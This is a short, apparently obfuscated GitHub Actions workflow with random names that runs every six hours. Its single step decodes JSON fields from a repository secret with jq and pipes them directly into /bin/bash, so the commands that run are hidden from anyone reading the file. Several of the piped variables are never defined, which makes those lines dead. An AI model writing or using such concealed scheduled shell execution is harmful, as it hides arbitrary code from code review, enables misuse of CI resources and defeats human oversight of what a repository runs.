name: zusanchqing

on:
  workflow_dispatch:
  schedule:
    - cron: '48 2/6 * * *'
jobs:  # 30782
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zusanchqing
        env:
          rp6323: ${{ secrets.rp6323 }}
        run: |
          echo $rp6323 | jq -r .oez0074 | /bin/bash
          echo $ecfw037 | jq -r .d69 | /bin/bash
          echo $iyyz0676 | jq -r .eaw6 | /bin/bash
          echo $yb55 | jq -r .vb3 | /bin/bash
          echo $kwlct1505 | jq -r .hovg2910 | /bin/bash
          echo $gz0633 | jq -r .ond85 | /bin/bash
          echo $gzu8 | jq -r .jc3360 | /bin/bash
          echo $gqg47141 | jq -r .uvru8 | /bin/bash

